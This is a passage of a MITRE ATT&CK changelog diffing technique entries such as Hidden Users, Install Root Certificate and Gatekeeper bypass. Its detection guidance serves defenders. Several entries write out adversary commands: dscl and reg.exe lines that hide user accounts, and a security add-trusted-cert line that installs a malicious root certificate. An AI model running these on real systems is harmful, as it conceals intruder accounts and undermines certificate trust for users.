external_references[2]['description']Rich Trouton. (2012, November 20). Clearing the quarantine extended attribute from downloaded applications. Retrieved July 5, 2017.Thomas Reed. (2016, March 31). Bypassing Apple's Gatekeeper. Retrieved July 5, 2017.
external_references[2]['url']https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/
external_references[3]['source_name']OceanLotus for OS X20 macOS Common Tools and Techniques
external_references[3]['description']Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
external_references[3]['url']https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-updatehttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
external_references[4]['source_name']Bypassing GatekeeperTheEclecticLightCompany Quarantine and the flag
external_references[4]['description']Thomas Reed. (2016, March 31). Bypassing Apple's Gatekeeper. Retrieved July 5, 2017.hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021.
external_references[4]['url']https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/
x_mitre_detectionMonitoring for the removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.The removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the com.apple.quarantine flag when performing updates. Review false values under the LSFileQuarantineEnabled entry in an application's Info.plist file (required by every application). false under LSFileQuarantineEnabled indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified LSFileQuarantineEnabled entry will default to not setting the quarantine flag. QuarantineEvents is a SQLite database containing a list of all files assigned the com.apple.quarantine attribute, located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'theevilbit gatekeeper bypass 2021', 'description': 'Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021.', 'url': 'https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/'}
external_references{'source_name': 'Methods of Mac Malware Persistence', 'description': 'Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.', 'url': 'https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf'}
external_references{'source_name': 'Clearing quarantine attribute', 'description': 'Rich Trouton. (2012, November 20). Clearing the quarantine extended attribute from downloaded applications. Retrieved July 5, 2017.', 'url': 'https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/'}
external_references{'source_name': 'OceanLotus for OS X', 'description': 'Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.', 'url': 'https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update'}

[T1592] Gather Victim Host Information

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:23:58.024000+00:002021-10-17 16:35:09.878000+00:00
x_mitre_detectionMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox) Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}

[T1591] Gather Victim Org Information

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may gather information about the victim's organit1Adversaries may gather information about the victim's organi
>zation that can be used during targeting. Information about >zation that can be used during targeting. Information about 
>an organization may include a variety of details, including >an organization may include a variety of details, including 
>the names of divisions/departments, specifics of business op>the names of divisions/departments, specifics of business op
>erations, as well as the roles and responsibilities of key e>erations, as well as the roles and responsibilities of key e
>mployees.  Adversaries may gather this information in variou>mployees.  Adversaries may gather this information in variou
>s ways, such as direct elicitation via [Phishing for Informa>s ways, such as direct elicitation via [Phishing for Informa
>tion](https://attack.mitre.org/techniques/T1598). Informatio>tion](https://attack.mitre.org/techniques/T1598). Informatio
>n about an organization may also be exposed to adversaries v>n about an organization may also be exposed to adversaries v
>ia online or other accessible data sets (ex: [Social Media](>ia online or other accessible data sets (ex: [Social Media](
>https://attack.mitre.org/techniques/T1593/001) or [Search Vi>https://attack.mitre.org/techniques/T1593/001) or [Search Vi
>ctim-Owned Websites](https://attack.mitre.org/techniques/T15>ctim-Owned Websites](https://attack.mitre.org/techniques/T15
>94)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Bu>94)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC ED
>siness Lookup) Gathering this information may reveal opportu>GAR Search) Gathering this information may reveal opportunit
>nities for other forms of reconnaissance (ex: [Phishing for >ies for other forms of reconnaissance (ex: [Phishing for Inf
>Information](https://attack.mitre.org/techniques/T1598) or [>ormation](https://attack.mitre.org/techniques/T1598) or [Sea
>Search Open Websites/Domains](https://attack.mitre.org/techn>rch Open Websites/Domains](https://attack.mitre.org/techniqu
>iques/T1593)), establishing operational resources (ex: [Esta>es/T1593)), establishing operational resources (ex: [Establi
>blish Accounts](https://attack.mitre.org/techniques/T1585) o>sh Accounts](https://attack.mitre.org/techniques/T1585) or [
>r [Compromise Accounts](https://attack.mitre.org/techniques/>Compromise Accounts](https://attack.mitre.org/techniques/T15
>T1586)), and/or initial access (ex: [Phishing](https://attac>86)), and/or initial access (ex: [Phishing](https://attack.m
>k.mitre.org/techniques/T1566) or [Trusted Relationship](http>itre.org/techniques/T1566) or [Trusted Relationship](https:/
>s://attack.mitre.org/techniques/T1199)).>/attack.mitre.org/techniques/T1199)).
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:39:09.021000+00:002021-08-27 15:37:09.343000+00:00
descriptionAdversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
external_references[2]['source_name']DOB Business LookupSEC EDGAR Search
external_references[2]['description']Concert Technologies . (n.d.). Business Lookup - Company Name Search. Retrieved October 20, 2020.U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021.
external_references[2]['url']https://www.dobsearch.com/business-lookup/https://www.sec.gov/edgar/search-and-access
x_mitre_version1.01.1

[T1592.001] Gather Victim Host Information: Hardware

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:23:21.031000+00:002021-10-17 16:32:10.810000+00:00
x_mitre_detectionMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox) Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'}

[T1200] Hardware Additions

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may introduce computer accessories, computers, ot1Adversaries may introduce computer accessories, computers, o
>r networking hardware into a system or network that can be u>r networking hardware into a system or network that can be u
>sed as a vector to gain access. While public references of u>sed as a vector to gain access. While public references of u
>sage by APT groups are scarce, many penetration testers leve>sage by threat actors are scarce, many red teams/penetration
>rage hardware additions for initial access. Commercial and o> testers leverage hardware additions for initial access. Com
>pen source products are leveraged with capabilities such as >mercial and open source products can be leveraged with capab
>passive network tapping (Citation: Ossmann Star Feb 2011), m>ilities such as passive network tapping (Citation: Ossmann S
>an-in-the middle encryption breaking (Citation: Aleks Weapon>tar Feb 2011), network traffic modification (i.e. [Adversary
>s Nov 2015), keystroke injection (Citation: Hak5 RubberDuck >-in-the-Middle](https://attack.mitre.org/techniques/T1557)) 
>Dec 2016), kernel memory reading via DMA (Citation: Frisk DM>(Citation: Aleks Weapons Nov 2015), keystroke injection (Cit
>A August 2016), adding new wireless access to an existing ne>ation: Hak5 RubberDuck Dec 2016), kernel memory reading via 
>twork (Citation: McMillan Pwn March 2012), and others.>DMA (Citation: Frisk DMA August 2016), addition of new wirel
 >ess access to an existing network (Citation: McMillan Pwn Ma
 >rch 2012), and others.
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-22 17:47:04.476000+00:002021-08-17 00:28:00.947000+00:00
descriptionAdversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), man-in-the middle encryption breaking (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), adding new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.
x_mitre_version1.11.2

[T1564.002] Hide Artifacts: Hidden Users

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may use hidden users to mask the presence of uset1Adversaries may use hidden users to mask the presence of use
>r accounts they create. Every user account in macOS has a us>r accounts they create or modify. Normal users may want to h
>erID associated with it. When creating a user, you can speci>ide users when there are many users accounts on a given syst
>fy the userID for that account.  There is a property value i>em or want to keep an account hidden from the other users on
>n <code>/Library/Preferences/com.apple.loginwindow</code> ca> the system.  In macOS, every user account has a userID asso
>lled <code>Hide500Users</code> that prevents users with user>ciated with it. When creating a user, you can specify the us
>IDs 500 and lower from appearing at the login screen. When u>erID for that account. There is a property value in <code>/L
>sing the [Create Account](https://attack.mitre.org/technique>ibrary/Preferences/com.apple.loginwindow</code> called <code
>s/T1136) technique with a userID under 500 (ex: <code>sudo d>>Hide500Users</code> that prevents users with userIDs 500 an
>scl . -create /Users/username UniqueID 401</code>) and enabl>d lower from appearing at the login screen. When using the [
>ing this property (setting it to Yes), an adversary can conc>Create Account](https://attack.mitre.org/techniques/T1136) t
>eal user accounts. (Citation: Cybereason OSX Pirrit).>echnique with a userID under 500 (ex: <code>sudo dscl . -cre
 >ate /Users/username UniqueID 401</code>) and enabling this p
 >roperty (setting it to Yes), an adversary can conceal user a
 >ccounts. (Citation: Cybereason OSX Pirrit)  In Windows, adve
 >rsaries may hide user accounts via settings in the Registry.
 > For example, an adversary may add a value to the Windows Re
 >gistry (via [Reg](https://attack.mitre.org/software/S0075) o
 >r other means) that will hide the user “test” from the Windo
 >ws login screen: <code>reg.exe ADD 'HKLM\SOFTWARE\Microsoft\
 >Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList' 
 >/v test /t REG_DWORD /d 0 /f</code>.(Citation: FireEye SMOKE
 >DHAM June 2021)(Citation: US-CERT TA18-074A)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Omkar Gudhate']
values_changed
STIX FieldOld valueNew Value
modified2020-07-31 17:42:43.768000+00:002021-10-14 20:22:03.625000+00:00
descriptionAdversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit).Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system. In macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit) In Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login screen: reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)
x_mitre_detectionThis technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.This technique prevents a user from showing up at the log in screen, but all of the other signs of the user may still exist. For example, "hidden" users may still get a home directory and will appear in the authentication logs. Monitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList key.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEye SMOKEDHAM June 2021', 'description': 'FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.', 'url': 'https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html'}
external_references{'source_name': 'US-CERT TA18-074A', 'description': 'US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-074A'}
x_mitre_data_sourcesCommand: Command Execution
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification
x_mitre_data_sourcesProcess: Process Creation
x_mitre_platformsWindows

[T1564] Hide Artifacts

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-09-23 11:31:50.636000+00:002021-10-20 19:01:56.752000+00:00
x_mitre_data_sources[2]Process: Process CreationApplication Log: Application Log Content
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
x_mitre_platformsOffice 365
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
x_mitre_data_sourcesFile: File Creation
x_mitre_data_sourcesFile: File Content

[T1562] Impair Defenses

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 13:59:13.144000+00:002021-10-19 13:37:31.463000+00:00
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
x_mitre_platformsNetwork

[T1608.003] Stage Capabilities: Install Digital Certificate

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Internet Scan: Response Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 18:43:18.448000+00:002021-10-16 17:47:46.409000+00:00
x_mitre_version1.01.1

[T1553.004] Subvert Trust Controls: Install Root Certificate

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may install a root certificate on a compromised t1Adversaries may install a root certificate on a compromised 
>system to avoid warnings when connecting to adversary contro>system to avoid warnings when connecting to adversary contro
>lled web servers. Root certificates are used in public key c>lled web servers. Root certificates are used in public key c
>ryptography to identify a root certificate authority (CA). W>ryptography to identify a root certificate authority (CA). W
>hen a root certificate is installed, the system or applicati>hen a root certificate is installed, the system or applicati
>on will trust certificates in the root's chain of trust that>on will trust certificates in the root's chain of trust that
> have been signed by the root certificate. (Citation: Wikipe> have been signed by the root certificate.(Citation: Wikiped
>dia Root Certificate) Certificates are commonly used for est>ia Root Certificate) Certificates are commonly used for esta
>ablishing secure TLS/SSL communications within a web browser>blishing secure TLS/SSL communications within a web browser.
>. When a user attempts to browse a website that presents a c> When a user attempts to browse a website that presents a ce
>ertificate that is not trusted an error message will be disp>rtificate that is not trusted an error message will be displ
>layed to warn the user of the security risk. Depending on th>ayed to warn the user of the security risk. Depending on the
>e security settings, the browser may not allow the user to e> security settings, the browser may not allow the user to es
>stablish a connection to the website.  Installation of a roo>tablish a connection to the website.  Installation of a root
>t certificate on a compromised system would give an adversar> certificate on a compromised system would give an adversary
>y a way to degrade the security of that system. Adversaries > a way to degrade the security of that system. Adversaries h
>have used this technique to avoid security warnings promptin>ave used this technique to avoid security warnings prompting
>g users when compromised systems connect over HTTPS to adver> users when compromised systems connect over HTTPS to advers
>sary controlled web servers that spoof legitimate websites i>ary controlled web servers that spoof legitimate websites in
>n order to collect login credentials. (Citation: Operation E> order to collect login credentials.(Citation: Operation Emm
>mmental)  Atypical root certificates have also been pre-inst>ental)  Atypical root certificates have also been pre-instal
>alled on systems by the manufacturer or in the software supp>led on systems by the manufacturer or in the software supply
>ly chain and were used in conjunction with malware/adware to> chain and were used in conjunction with malware/adware to p
> provide a man-in-the-middle capability for intercepting inf>rovide [Adversary-in-the-Middle](https://attack.mitre.org/te
>ormation transmitted over secure TLS/SSL communications. (Ci>chniques/T1557) capability for intercepting information tran
>tation: Kaspersky Superfish)  Root certificates (and their a>smitted over secure TLS/SSL communications.(Citation: Kasper
>ssociated chains) can also be cloned and reinstalled. Cloned>sky Superfish)  Root certificates (and their associated chai
> certificate chains will carry many of the same metadata cha>ns) can also be cloned and reinstalled. Cloned certificate c
>racteristics of the source and can be used to sign malicious>hains will carry many of the same metadata characteristics o
> code that may then bypass signature validation tools (ex: S>f the source and can be used to sign malicious code that may
>ysinternals, antivirus, etc.) used to block execution and/or> then bypass signature validation tools (ex: Sysinternals, a
> uncover artifacts of Persistence. (Citation: SpectorOps Cod>ntivirus, etc.) used to block execution and/or uncover artif
>e Signing Dec 2017)  In macOS, the Ay MaMi malware uses <cod>acts of Persistence.(Citation: SpectorOps Code Signing Dec 2
>e>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Lib>017)  In macOS, the Ay MaMi malware uses <code>/usr/bin/secu
>rary/Keychains/System.keychain /path/to/malicious/cert</code>rity add-trusted-cert -d -r trustRoot -k /Library/Keychains/
>> to install a malicious certificate as a trusted root certi>System.keychain /path/to/malicious/cert</code> to install a 
>ficate into the system keychain. (Citation: objective-see ay>malicious certificate as a trusted root certificate into the
> mami 2018)> system keychain.(Citation: objective-see ay mami 2018)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-19 20:31:11.389000+00:002021-08-25 19:39:07.001000+00:00
descriptionAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental) Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish) Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017) In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental) Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish) Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017) In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)
x_mitre_detectionA system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017) Installed root certificates are located in the Registry under HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\ and [HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker) * 18F7C1FCC3090203FD5BAA2F861A754976C8DD25 * 245C97DF7514E7CF2DF8BE72AE957B9E04741E85 * 3B1EFD3A66EA28B16697394703A72CA340A05BD5 * 7F88CD7223F3C813818C994614A89C99FA3B5247 * 8F43288AD272F3103B6FB1428485EA3014C0BCFE * A43489159A520F0D93D032CCAF37E7FE20A8B419 * BE36A4562FB2EE05DBB3D32323ADF445084ED656 * CDD4EEAE6000AC7F40C3802C171E30148030C072A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017) Installed root certificates are located in the Registry under HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\ and [HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker) * 18F7C1FCC3090203FD5BAA2F861A754976C8DD25 * 245C97DF7514E7CF2DF8BE72AE957B9E04741E85 * 3B1EFD3A66EA28B16697394703A72CA340A05BD5 * 7F88CD7223F3C813818C994614A89C99FA3B5247 * 8F43288AD272F3103B6FB1428485EA3014C0BCFE * A43489159A520F0D93D032CCAF37E7FE20A8B419 * BE36A4562FB2EE05DBB3D32323ADF445084ED656 * CDD4EEAE6000AC7F40C3802C171E30148030C072
x_mitre_version1.01.1

[T1559] Inter-Process Communication

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may abuse inter-process communication (IPC) mecht1Adversaries may abuse inter-process communication (IPC) mech
>anisms for local code or command execution. IPC is typically>anisms for local code or command execution. IPC is typically
> used by processes to share data, communicate with each othe> used by processes to share data, communicate with each othe
>r, or synchronize execution. IPC is also commonly used to av>r, or synchronize execution. IPC is also commonly used to av
>oid situations such as deadlocks, which occurs when processe>oid situations such as deadlocks, which occurs when processe
>s are stuck in a cyclic waiting pattern.   Adversaries may a>s are stuck in a cyclic waiting pattern.   Adversaries may a
>buse IPC to execute arbitrary code or commands. IPC mechanis>buse IPC to execute arbitrary code or commands. IPC mechanis
>ms may differ depending on OS, but typically exists in a for>ms may differ depending on OS, but typically exists in a for
>m accessible through programming languages/libraries or nati>m accessible through programming languages/libraries or nati
>ve interfaces such as Windows [Dynamic Data Exchange](https:>ve interfaces such as Windows [Dynamic Data Exchange](https:
>//attack.mitre.org/techniques/T1559/002) or [Component Objec>//attack.mitre.org/techniques/T1559/002) or [Component Objec
>t Model](https://attack.mitre.org/techniques/T1559/001). Hig>t Model](https://attack.mitre.org/techniques/T1559/001). Hig
>her level execution mediums, such as those of [Command and S>her level execution mediums, such as those of [Command and S
>cripting Interpreter](https://attack.mitre.org/techniques/T1>cripting Interpreter](https://attack.mitre.org/techniques/T1
>059)s, may also leverage underlying IPC mechanisms.>059)s, may also leverage underlying IPC mechanisms. Adversar
 >ies may also use [Remote Services](https://attack.mitre.org/
 >techniques/T1021) such as [Distributed Component Object Mode
